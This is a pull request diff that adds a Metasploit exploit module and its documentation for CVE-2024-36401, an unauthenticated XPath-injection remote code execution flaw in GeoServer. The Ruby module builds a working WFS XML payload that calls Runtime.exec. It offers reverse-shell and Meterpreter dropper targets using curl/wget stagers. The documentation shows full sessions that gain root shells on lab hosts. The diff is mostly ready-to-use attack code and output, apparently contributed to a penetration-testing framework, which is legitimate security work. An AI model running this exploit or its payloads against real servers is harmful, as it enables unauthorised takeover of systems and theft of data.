### PR TITLE
GeoServer unauthenticated RCE [CVE-2024-36401] 

### DIFF
--- a/documentation/modules/exploit/multi/http/geoserver_unauth_rce_cve_2024_36401.md
+++ b/documentation/modules/exploit/multi/http/geoserver_unauth_rce_cve_2024_36401.md
@@ -155,7 +155,7 @@ msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
 [*] Started reverse TCP handler on 192.168.201.8:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Trying to detect if target is running a vulnerable version of GeoServer.
-[+] The target is vulnerable. Version 2.23.5
+[+] The target appears to be vulnerable. Version 2.23.5
 [*] Executing Unix Command for cmd/unix/reverse_bash
 [*] Command shell session 7 opened (192.168.201.8:4444 -> 192.168.201.86:54072) at 2024-07-11 16:09:30 +0000
 
@@ -180,7 +180,7 @@ msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
 [*] Started reverse TCP handler on 192.168.201.8:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Trying to detect if target is running a vulnerable version of GeoServer.
-[+] The target is vulnerable. Version 2.23.5
+[+] The target appears to be vulnerable. Version 2.23.5
 [*] Executing Unix Command for cmd/unix/reverse_bash
 [*] Command shell session 8 opened (192.168.201.8:4444 -> 192.168.201.10:50292) at 2024-07-11 16:15:31 +0000
 
@@ -205,7 +205,7 @@ msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
 [*] Started reverse TCP handler on 192.168.201.8:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Trying to detect if target is running a vulnerable version of GeoServer.
-[+] The target is vulnerable. Version 2.23.2
+[+] The target appears to be vulnerable. Version 2.23.2
 [*] Executing Unix Command for cmd/unix/reverse_bash
 [*] Command shell session 9 opened (192.168.201.8:4444 -> 192.168.201.42:60290) at 2024-07-11 18:42:08 +0000
 
@@ -229,7 +229,7 @@ msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
 [*] Started reverse TCP handler on 192.168.201.8:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Trying to detect if target is running a vulnerable version of GeoServer.
-[+] The target is vulnerable. Version 2.23.2
+[+] The target appears to be vulnerable. Version 2.23.2
 [*] Executing Linux Dropper for linux/x64/meterpreter_reverse_tcp
 [*] Using URL: http://192.168.201.8:1981/FEflDEJ
 [*] Client 192.168.201.42 (curl/7.74.0) requested /FEflDEJ
@@ -261,7 +261,7 @@ msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
 [*] Started reverse TCP handler on 192.168.201.8:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Trying to detect if target is running a vulnerable version of GeoServer.
-[+] The target is vulnerable. Version 2.25.0
+[+] The target appears to be vulnerable. Version 2.25.0
 [*] Executing Linux Dropper for linux/x64/meterpreter_reverse_tcp
 [*] Using URL: http://192.168.201.8:1981/CEkJIBo
 [*] Client 192.168.201.42 (curl/7.81.0) requested /CEkJIBo
@@ -295,7 +295,7 @@ msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
 [*] Started reverse TCP handler on 192.168.201.8:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Trying to detect if target is running a vulnerable version of GeoServer.
-[+] The target is vulnerable. Version 2.23.5
+[+] The target appears to be vulnerable. Version 2.23.5
 [*] Executing Linux Dropper for linux/aarch64/meterpreter_reverse_tcp
 [*] Using URL: http://192.168.201.8:1981/680jWmUv1qm
 [*] Client 192.168.201.10 (curl/8.5.0) requested /680jWmUv1qm
@@ -331,7 +331,7 @@ msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > run
 [*] Started reverse TCP handler on 172.16.199.1:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Trying to detect if target is running a vulnerable version of GeoServer.
-[+] The target is vulnerable. Version 2.25.0
+[+] The target appears to be vulnerable. Version 2.25.0
 [*] Executing Windows Command for cmd/windows/http/x64/meterpreter/reverse_tcp
 [*] Sending stage (201798 bytes) to 172.16.199.131
 [*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.131:51235) at 2024-07-11 16:14:11 -0700

--- a/documentation/modules/exploit/multi/http/geoserver_unauth_rce_cve_2024_36401.md
+++ b/documentation/modules/exploit/multi/http/geoserver_unauth_rce_cve_2024_36401.md
@@ -65,7 +65,7 @@ msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > info
        Name: Geoserver unauthenticated Remote Code Execution
      Module: exploit/multi/http/geoserver_unauth_rce_cve_2024_36401
    Platform: Unix, Linux
-       Arch: cmd, x86, x64, aarch64
+       Arch: cmd, x86, x64, aarch64, armle
  Privileged: Yes
     License: Metasploit Framework License (BSD)
        Rank: Excellent

--- a/documentation/modules/exploit/multi/http/geoserver_unauth_rce_cve_2024_36401.md
+++ b/documentation/modules/exploit/multi/http/geoserver_unauth_rce_cve_2024_36401.md
@@ -1,0 +1,316 @@
+## Vulnerable Application
+
+GeoServer is an open-source software server written in Java that provides the ability to view, edit, and sharegeospatial data.
+It is designed to be a flexible, efficient solution for distributing geospatial data from a variety of sources such as
+Geographic Information System (GIS) databases, web-based data, and personal datasets.
+
+In the GeoServer versions prior to `2.23.6`, between version `2.24.0` and `2.24.3` and in version `2.25.0`, `2.25.1`,
+multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users through specially crafted input
+against a default GeoServer installation due to unsafely evaluating property names as `XPath` expressions.
+An attacker can abuse this by sending a POST request with a malicious xpath expression to execute arbitrary commands as root on the system.
+
+The following GeoServer releases are tested:
+
+**Osgeo.org Docker releases with Tomcat**
+* docker.osgeo.org/geoserver 2.25.0
+* docker.osgeo.org/geoserver 2.24.2
+* docker.osgeo.org/geoserver 2.23.2
+* docker.osgeo.org/geoserver 2.23.0
+* docker.osgeo.org/geoserver 2.21.1
+
+**Vulhub Docker releases with Jetty**
+* vulhub/geoserver 2.23.2
+* vulhub/geoserver 2.22.1
+
+**Linux binary installs with Jetty**
+* geoserver 2.23.5 on x64 Ubuntu 22.04
+* geoserver 2.23.5 on Raspberry PI-4 ARM64 Kali Linux 2024.4
+
+## Installation steps to install the GeoServer web application
+* [Installation steps](https://docs.geoserver.org/latest/en/user/installation/linux.html) for platform-independent Linux binary.
+* [Installation steps](https://docs.geoserver.org/latest/en/user/installation/docker.html) for osgeo.org/geoserver docker images.
+* Use the docker-compose.yaml config file below to pull the vulhub geoserver docker images.
+```yaml
+version: '3'
+services:
+ web:
+   image: vulhub/geoserver:2.23.2
+   ports:
+    - "8080:8080"
+    - "5005:5005"
+```
+*  Pull and install the docker image with `docker compose up -d`
+* You should now be able to access the GeoServer web application via `http://your_ip:8080/geoserver`.
+
+You are ready to test the module.
+
+## Verification Steps
+
+- [ ] Start `msfconsole`
+- [ ] `use exploit/multi/http/geoserver_unauth_rce_cve_2024_36401`
+- [ ] `set rhosts <ip-target>`
+- [ ] `set rport <port>`
+- [ ]  `set lhost <attacker-ip>`
+- [ ] `set target <0=Unix Command, 1=Linux Dropper>`
+- [ ] `exploit`
+- [ ] you should get a `reverse shell` or `Meterpreter` session depending on the `payload` and `target` settings
+
+## Options
+No specific options.
+
+## Scenarios
+```msf
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > info
+
+       Name: Geoserver unauthenticated Remote Code Execution
+     Module: exploit/multi/http/geoserver_unauth_rce_cve_2024_36401
+   Platform: Unix, Linux
+       Arch: cmd, x86, x64, aarch64
+ Privileged: Yes
+    License: Metasploit Framework License (BSD)
+       Rank: Excellent
+  Disclosed: 2024-07-01
+
+Provided by:
+  h00die-gr3y <h00die.gr3y@gmail.com>
+  Steve Ikeoka
+
+Module side effects:
+ ioc-in-logs
+ artifacts-on-disk
+
+Module stability:
+ crash-safe
+
+Module reliability:
+ repeatable-session
+
+Available targets:
+      Id  Name
+      --  ----
+  =>  0   Unix Command
+      1   Linux Dropper
+
+Check supported:
+  Yes
+
+Basic options:
+  Name       Current Setting  Required  Description
+  ----       ---------------  --------  -----------
+  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basi
+                                        cs/using-metasploit.html
+  RPORT      8080             yes       The target port (TCP)
+  SSL        false            no        Negotiate SSL/TLS for outgoing connections
+  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
+  TARGETURI  /                yes       The URI path of the OpenMediaVault web application
+  URIPATH                     no        The URI to use for this exploit (default is random)
+  VHOST                       no        HTTP server virtual host
+
+
+  When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the
+                                       local machine or 0.0.0.0 to listen on all addresses.
+  SRVPORT  8080             yes       The local port to listen on.
+
+Payload information:
+
+Description:
+  GeoServer is an open-source software server written in Java that provides
+  the ability to view, edit, and share geospatial data.
+  It is designed to be a flexible, efficient solution for distributing geospatial data
+  from a variety of sources such as Geographic Information System (GIS) databases,
+  web-based data, and personal datasets.
+  In the GeoServer versions < 2.23.6, >= 2.24.0, < 2.24.4 and >= 2.25.0, < 2.25.1,
+  multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users
+  through specially crafted input against a default GeoServer installation due to unsafely
+  evaluating property names as XPath expressions.
+  An attacker can abuse this by sending a POST request with a malicious xpath expression
+  to execute arbitrary commands as root on the system.
+
+References:
+  https://nvd.nist.gov/vuln/detail/CVE-2024-36401
+  https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv
+  https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401
+  https://attackerkb.com/topics/W6IDY2mmp9/cve-2024-36401
+
+
+View the full module info with the info -d command.
+```
+###  GeoServer 2.23.5 on x64 Ubuntu 22.04 - cmd/unix/reverse_bash
+```msf
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401)  > set rhosts 192.168.201.86
+rhosts => 192.168.201.86
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401)  > set lhost 192.168.201.8
+lhost => 192.168.201.8
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Trying to detect if target is running a vulnerable version of GeoServer.
+[+] The target is vulnerable. Version 2.23.5
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[*] Command shell session 7 opened (192.168.201.8:4444 -> 192.168.201.86:54072) at 2024-07-11 16:09:30 +0000
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux cuckoo 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
+pwd
+/usr/share/geoserver
+exit
+```
+###  GeoServer 2.23.5 on ARM64 Raspberry PI-4 Kali Linux 2024.4 - cmd/unix/reverse_bash
+```msf
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 0
+target => 0
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set rhosts 192.168.201.10
+rhosts => 192.168.201.10
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set lhost 192.168.201.8
+lhost => 192.168.201.8
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Trying to detect if target is running a vulnerable version of GeoServer.
+[+] The target is vulnerable. Version 2.23.5
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[*] Command shell session 8 opened (192.168.201.8:4444 -> 192.168.201.10:50292) at 2024-07-11 16:15:31 +0000
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux cerberus 5.15.44-Re4son-v8l+ #1 SMP PREEMPT Debian kali-pi (2022-07-11) aarch64 GNU/Linux
+pwd
+/usr/share/geoserver
+exit
+```
+###  GeoServer 2.23.2 on vulhub docker image - cmd/unix/reverse_bash
+```msf
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 0
+target => 0
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set rhosts 192.168.201.42
+rhosts => 192.168.201.10
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set lhost 192.168.201.8
+lhost => 192.168.201.8
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Trying to detect if target is running a vulnerable version of GeoServer.
+[+] The target is vulnerable. Version 2.23.2
+[*] Executing Unix Command for cmd/unix/reverse_bash
+[*] Command shell session 9 opened (192.168.201.8:4444 -> 192.168.201.42:60290) at 2024-07-11 18:42:08 +0000
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux e3f986905bde 6.6.32-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Jun 13 14:14:43 UTC 2024 x86_64 GNU/Linux
+pwd
+/mnt/geoserver
+```
+###  GeoServer 2.23.2 on vulhub docker image - linux/x64/meterpreter_reverse_tcp
+```msf
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 1
+target => 1
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set payload linux/x64/meterpreter_reverse_tcp
+payload => linux/x64/meterpreter_reverse_tcp
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set srvport 1981
+srvport => 1981
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Trying to detect if target is running a vulnerable version of GeoServer.
+[+] The target is vulnerable. Version 2.23.2
+[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_tcp
+[*] Using URL: http://192.168.201.8:1981/FEflDEJ
+[*] Client 192.168.201.42 (curl/7.74.0) requested /FEflDEJ
+[*] Sending payload to 192.168.201.42 (curl/7.74.0)
+[*] Command Stager progress - 100.00% done (113/113 bytes)
+[*] Meterpreter session 10 opened (192.168.201.8:4444 -> 192.168.201.42:60353) at 2024-07-11 18:48:02 +0000
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 172.21.0.2
+OS           : Debian 11.3 (Linux 6.6.32-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: root
+meterpreter > pwd
+/mnt/geoserver
+meterpreter >
+```
+###  GeoServer 2.25.0 on osgeo.org/geoserver docker image - linux/x64/meterpreter_reverse_tcp
+```msf
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 1
+target => 1
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set payload linux/x64/meterpreter_reverse_tcp
+payload => linux/x64/meterpreter_reverse_tcp
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Trying to detect if target is running a vulnerable version of GeoServer.
+[+] The target is vulnerable. Version 2.25.0
+[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_tcp
+[*] Using URL: http://192.168.201.8:1981/CEkJIBo
+[*] Client 192.168.201.42 (curl/7.81.0) requested /CEkJIBo
+[*] Sending payload to 192.168.201.42 (curl/7.81.0)
+[*] Command Stager progress - 100.00% done (113/113 bytes)
+[*] Meterpreter session 11 opened (192.168.201.8:4444 -> 192.168.201.42:61350) at 2024-07-11 20:46:14 +0000
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Ubuntu 22.04 (Linux 6.6.32-linuxkit)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid
+Server username: root
+meterpreter > pwd
+/opt
+meterpreter >
+```
+###  GeoServer 2.23.5 on ARM64 Raspberry PI-4 Kali Linux 2024.4 - linux/aarch64/meterpreter_reverse_tcp
+```msf
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 1
+target => 1
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set payload linux/aarch64/meterpreter_reverse_tcp
+payload => linux/aarch64/meterpreter_reverse_tcp
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set rhosts 192.168.201.10
+rhosts => 192.168.201.10
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > exploit
+
+[*] Started reverse TCP handler on 192.168.201.8:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Trying to detect if target is running a vulnerable version of GeoServer.
+[+] The target is vulnerable. Version 2.23.5
+[*] Executing Linux Dropper for linux/aarch64/meterpreter_reverse_tcp
+[*] Using URL: http://192.168.201.8:1981/680jWmUv1qm
+[*] Client 192.168.201.10 (curl/8.5.0) requested /680jWmUv1qm
+[*] Sending payload to 192.168.201.10 (curl/8.5.0)
+[*] Command Stager progress - 100.00% done (117/117 bytes)
+[*] Meterpreter session 12 opened (192.168.201.8:4444 -> 192.168.201.10:60692) at 2024-07-11 21:04:34 +0000
+[*] Server stopped.
+
+meterpreter > sysinfo
+Computer     : 192.168.201.10
+OS           : Debian  (Linux 5.15.44-Re4son-v8l+)
+Architecture : aarch64
+BuildTuple   : aarch64-linux-musl
+Meterpreter  : aarch64/linux
+meterpreter > getuid
+Server username: root
+meterpreter > pwd
+/usr/share/geoserver
+meterpreter >
+```
+## Limitations
+No limitations.

--- a/documentation/modules/exploit/multi/http/geoserver_unauth_rce_cve_2024_36401.md
+++ b/documentation/modules/exploit/multi/http/geoserver_unauth_rce_cve_2024_36401.md
@@ -26,7 +26,11 @@ The following GeoServer releases are tested:
 * geoserver 2.23.5 on x64 Ubuntu 22.04
 * geoserver 2.23.5 on Raspberry PI-4 ARM64 Kali Linux 2024.4
 
+**Windows 10 installer installs with Jetty**
+* geoserver 2.25.0 on x64 Windows 10 (10.0 Build 19045)
+
 ## Installation steps to install the GeoServer web application
+* [Installation steps](https://docs.geoserver.org/latest/en/user/installation/win_installer.html) for Windows installer.
 * [Installation steps](https://docs.geoserver.org/latest/en/user/installation/linux.html) for platform-independent Linux binary.
 * [Installation steps](https://docs.geoserver.org/latest/en/user/installation/docker.html) for osgeo.org/geoserver docker images.
 * Use the docker-compose.yaml config file below to pull the vulhub geoserver docker images.
@@ -310,6 +314,38 @@ meterpreter > getuid
 Server username: root
 meterpreter > pwd
 /usr/share/geoserver
+meterpreter >
+```
+### GeoServer 2.25.0 on x64 Windows 10 (10.0 Build 19045)
+```
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set rhosts 172.16.199.131
+rhosts => 172.16.199.131
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set lhost 172.16.199.1
+lhost => 172.16.199.1
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set target 2
+target => 2
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
+payload => cmd/windows/http/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/geoserver_unauth_rce_cve_2024_36401) > run
+
+[*] Started reverse TCP handler on 172.16.199.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Trying to detect if target is running a vulnerable version of GeoServer.
+[+] The target is vulnerable. Version 2.25.0
+[*] Executing Windows Command for cmd/windows/http/x64/meterpreter/reverse_tcp
+[*] Sending stage (201798 bytes) to 172.16.199.131
+[*] Meterpreter session 2 opened (172.16.199.1:4444 -> 172.16.199.131:51235) at 2024-07-11 16:14:11 -0700
+
+meterpreter > getuid
+Server username: DESKTOP-N3ORU31\msfuser
+meterpreter > sysinfo
+Computer        : DESKTOP-N3ORU31
+OS              : Windows 10 (10.0 Build 19045).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
 meterpreter >
 ```
 ## Limitations

--- a/modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb
+++ b/modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb
@@ -30,13 +30,13 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Author' => [
           'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
-          'Steve Ikeoka' # Original Discovery
+          'Steve Ikeoka' # Discovery
         ],
         'References' => [
           ['CVE', '2024-36401'],
           ['URL', 'https://github.com/geoserver/geoserver/security/advisories/GHSA-6jj6-gm7p-fcvv'],
           ['URL', 'https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401'],
-          ['URL', 'https://attackerkb.com/topics/xxxxx/cve-2024-36401']
+          ['URL', 'https://attackerkb.com/topics/W6IDY2mmp9/cve-2024-36401']
         ],
         'DisclosureDate' => '2024-07-01',
         'Platform' => ['unix', 'linux'],
@@ -124,8 +124,8 @@ class MetasploitModule < Msf::Exploit::Remote
       xml.remove_namespaces!
       # get all the FeatureTypes and store them in an array of strings
       retrieved_feature_types = xml.xpath('//ReturnFeatureType')
-      # shuffle the retrieved_feature_types array, and loop through the list of retrieved_feature_types from GeoServer.
-      # return the string value if a match is found in the allowed_feature_types array
+      # shuffle the retrieved_feature_types array, and loop through the list of retrieved_feature_types from GeoServer
+      # return the feature type if a match is found in the allowed_feature_types array
       retrieved_feature_types.to_a.shuffle.each do |feature_type|
         return feature_type.text if allowed_feature_types.include?(feature_type.text)
       end

--- a/modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb
+++ b/modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2024-07-01',
         'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_AARCH64],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64, ARCH_AARCH64, ARCH_ARMLE],
         'Privileged' => true,
         'Targets' => [
           [

--- a/modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb
+++ b/modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => ['unix', 'linux'],
               'Arch' => ARCH_CMD,
-              'Type' => :unix_cmd,
+              'Type' => :unix_cmd
               # Tested with cmd/unix/reverse_bash
             }
           ],
@@ -60,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Arch' => [ARCH_X86, ARCH_X64, ARCH_AARCH64, ARCH_ARMLE],
               'Type' => :linux_dropper,
               'Linemax' => 16384,
-              'CmdStagerFlavor' => ['curl', 'wget', 'echo', 'printf', 'bourne'],
+              'CmdStagerFlavor' => ['curl', 'wget', 'echo', 'printf', 'bourne']
               # Tested with linux/x64/meterpreter_reverse_tcp
             }
           ],
@@ -69,7 +69,7 @@ class MetasploitModule < Msf::Exploit::Remote
             {
               'Platform' => ['Windows'],
               'Arch' => ARCH_CMD,
-              'Type' => :win_cmd,
+              'Type' => :win_cmd
               # Tested with cmd/windows/http/x64/meterpreter/reverse_tcp
             }
           ],

--- a/modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb
+++ b/modules/exploits/multi/http/geoserver_unauth_rce_cve_2024_36401.rb
@@ -1,0 +1,181 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Geoserver unauthenticated Remote Code Execution',
+        'Description' => %q{
+          GeoServer is an open-source software server written in Java that provides
+          the ability to view, edit, and share geospatial data.
+          It is designed to be a flexible, efficient solution for distributing geospatial data
+          from a variety of sources such as Geographic Information System (GIS) databases,
+          web-based data, and personal datasets.
+          In the GeoServer version prior to 2.25.1, 2.24.3 and 2.23.5 of GeoServer,
+          multiple OGC request parameters allow Remote Code Execution (RCE) by unauthenticated users
+          through specially crafted input against a default GeoServer installation due to unsafely
+          evaluating property names as XPath expressions.
+          An attacker can abuse this by sending a POST request with a malicious xpath expression
+          to execute arbitrary commands as root on the system.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
+          'Brandon Perry <bperry.volatile[at]gmail.com>', # Original Discovery
+          'Mert BENADAM' # exploit author
+        ],
+        'References' => [
+          ['CVE', '2024-36401'],
+          ['URL', 'https://github.com/vulhub/vulhub/tree/master/geoserver/CVE-2024-36401'],
+          ['URL', 'https://attackerkb.com/topics/xxxxx/cve-2024-36401']
+        ],
+        'DisclosureDate' => '2024-05-08',
+        'Platform' => ['unix', 'linux', 'win'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'Payload' => {
+                'BadChars' => "\x24\x28\x29\x3B\x3C\x3E\x7C\x60" # > < | $ ; () unix shell metacharacters are not allowed, but even then most payloads fail
+              },
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => ['linux'],
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'Linemax' => 16384,
+              'CmdStagerFlavor' => ['curl', 'wget', 'echo', 'printf', 'bourne'],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter_reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Command',
+            {
+              'Platform' => ['win'],
+              'Arch' => ARCH_CMD,
+              'Type' => :windows_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/windows/powershell/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Windows Dropper',
+            {
+              'Platform' => ['win'],
+              'Arch' => [ARCH_X64, ARCH_X86],
+              'Type' => :windows_dropper,
+              'Linemax' => 16384,
+              'CmdStagerFlavor' => ['psh_invokewebrequest', 'vbs', 'debug_asm', 'debug_write', 'certutil'],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8080,
+          'SSL' => false
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI path of the OpenMediaVault web application', '/'])
+      ]
+    )
+  end
+
+  def check_version
+    print_status('Trying to detect if target is running a vulnerable version of GeoServer.')
+    res = send_request_cgi!({
+      'uri' => normalize_uri(target_uri.path, 'geoserver', 'web', 'wicket', 'bookmarkable', 'org.geoserver.web.AboutGeoServerPage'),
+      'method' => 'GET'
+    })
+    return nil unless res && res.code == 200 && res.body.include?('GeoServer Version')
+
+    html = Nokogiri.HTML(res.body, nil, 'UTF-8')
+    # html identifier for Geoserver version information: <span id="version">2.23.2</span>
+    version = html.css('span[id="version"]')
+    return Rex::Version.new(version[0].text) unless version[0].nil?
+
+    nil
+  end
+
+  def create_payload(cmd)
+    # create payload
+    return <<~EOS
+      <wfs:GetPropertyValue service='WFS' version='2.0.0'
+        xmlns:topp='http://www.openplans.org/topp'
+        xmlns:fes='http://www.opengis.net/fes/2.0'
+        xmlns:wfs='http://www.opengis.net/wfs/2.0'>
+          <wfs:Query typeNames='sf:archsites'/>
+          <wfs:valueReference>exec(java.lang.Runtime.getRuntime(), "#{cmd}")</wfs:valueReference>
+      </wfs:GetPropertyValue>
+    EOS
+  end
+
+  def execute_command(cmd, _opts = {})
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'geoserver', 'wfs'),
+      'method' => 'POST',
+      'ctype' => 'application/xml',
+      'data' => create_payload(cmd).to_s
+    })
+    fail_with(Failure::PayloadFailed, 'Payload execution failed.') unless res && res.code == 400 && res.body.include?('ClassCastException')
+  end
+
+  def check
+    version_number = check_version
+    unless version_number.nil?
+      if version_number < Rex::Version.new('2.25.1') || version_number < Rex::Version.new('2.24.3') || version_number < Rex::Version.new('2.23.5')
+        return CheckCode::Vulnerable("Version #{version_number}")
+      else
+        return CheckCode::Safe("Version #{version_number}")
+      end
+    end
+    CheckCode::Unknown('Could not retrieve the version information.')
+  end
+
+  def exploit
+    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    case target['Type']
+    when :unix_cmd, :windows_cmd
+      # print_status(payload.encoded.to_s)
+      execute_command(payload.encoded)
+    when :linux_dropper, :windows_dropper
+      # don't check the response here since the server won't respond
+      # if the payload is successfully executed.
+      execute_cmdstager({ noconcat: true, linemax: target.opts['Linemax'] })
+    end
+  end
